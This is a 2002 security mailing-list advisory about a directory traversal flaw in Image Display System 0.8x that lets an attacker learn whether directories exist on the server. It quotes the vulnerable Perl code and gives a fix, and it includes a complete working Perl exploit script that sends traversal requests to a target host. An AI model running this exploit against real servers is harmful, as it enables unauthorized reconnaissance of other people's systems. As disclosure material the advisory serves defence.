[EXPL] Information Disclosure Vulnerability in Image Display System

From: support@securiteam.com
Date: 05/29/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 29 May 2002 07:38:30 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Information Disclosure Vulnerability in Image Display System
------------------------------------------------------------------------

SUMMARY

 <http://ids.sourceforge.net/> IDS (Image Display System) is a CGI written
in Perl that interactively generates a photo album website. A security
vulnerability in the product will cause it to disclose sensitive
information about the host it is running on.

DETAILS

Vulnerable systems:
 * Image Display System version 0.8x

When an attacker sends inside the album variable a traversed directory
(i.e. /../../../../home/foobar), the product will enable the attacker to
determine whether the specified directory exists by examining the returned
error page. This is possible do to the following segment of code:

idsShared.pm::getAlbumToDisplay()
    if ($albumtodisplay ne '/' && !-e $ppath . "albums/$albumtodisplay") {
# does this album exist? bail ("Sorry, the album \"$albumtodisplay\"
doesn't exist: $!");
    }
    
    if ($albumtodisplay =~ /\.\./) { # hax0r protection... bail ("Sorry,
invalid directory name: $!");
    }

Attached below is a working exploit for this vulnerability. The fix is
simple, just flip the "if statements" around so it checks for ".."'s
first. Also note there is the same type of information disclosure
vulnerability in index.cgi via the following code:

index.cgi::processData()
  if ($mode eq 'image') {
    getAlbumToDisplay();
    $imagetodisplay = $query->param('image') || bail ("Sorry, no image
name was provided: $!");

    unless (-e "albums$albumtodisplay/$imagetodisplay") { # does this
album exist? bail ("Sorry, the image
\"albums$albumtodisplay/$imagetodisplay\" doesn't exist: $!");
}
}

if (($imagetodisplay =~ /\.\./) || ($albumtodisplay =~ /\.\./)) {
bail ("Directory/image paths must not include \"../\".");
}

Exploit:
#!/usr/bin/perl -w
#
# ids-inform.pl (05/27/2002)
#
# Image Display System 0.8x Information Disclosure Exploit.
# Checks for existance of specified directory.
#
# By: isox [isox@chainsawbeer.com]
#
#
# usage: self explanitory
#
# my spelling: bad
#
# Hi Cody, You should be proud, I coded for you!
# Hi YpCat, Your perl is k-rad and pheersom.
#
#######
# URL #
#######
# http://0xc0ffee.com
# http://hhp-programming.net
#
#
#################
# Advertisement #
#################
#
# Going to Defcon X this year? Well come to the one and only Dennys at
Defcon breakfast.
# This is quickly becoming a yearly tradition put on by isox. Check
0xc0ffee.com for
# more information.
#

$maxdepth = 30;

&Banner;

if ($#ARGV < 3) {
  die("Usage $0 <directory> <http://host/path/to/index.cgi> <host>
<port>\n");
}

for($t=0; $t<$maxdepth; $t++) {
  $dotdot = "$dotdot" . "/..";
}

$query = "GET $ARGV[1]" . "?mode=album&album=$dotdot/$ARGV[0]\n\n";
$blahblah = &Directory($query, $ARGV[2], $ARGV[3]);

if($blahblah =~ /Sorry, invalid directory name/) {
  print("$ARGV[0] Exists.\n");
} else {
  print("$ARGV[0] Does Not Exist.\n");
}

exit 0;

sub Banner {
  print("IDS Information Disclosure Exploit\n");
  print("Written by isox [isox\@chainsawbeer.com]\n\n");
}

sub Directory {
  use IO::Socket::INET;

  my($query, $host, $port) = @_;

  $sock = new IO::Socket::INET (
            PeerAddr => $host,
            PeerPort => $port,
            Timeout => 8,
            Proto => 'tcp'
          );

  if(!$sock) {
    die("sock: timed out\n");
  }

  print $sock $query;
  read($sock, $buf, 8192);
  close($sock);

  return $buf;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:isox@chainsawbeer.com> isox.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages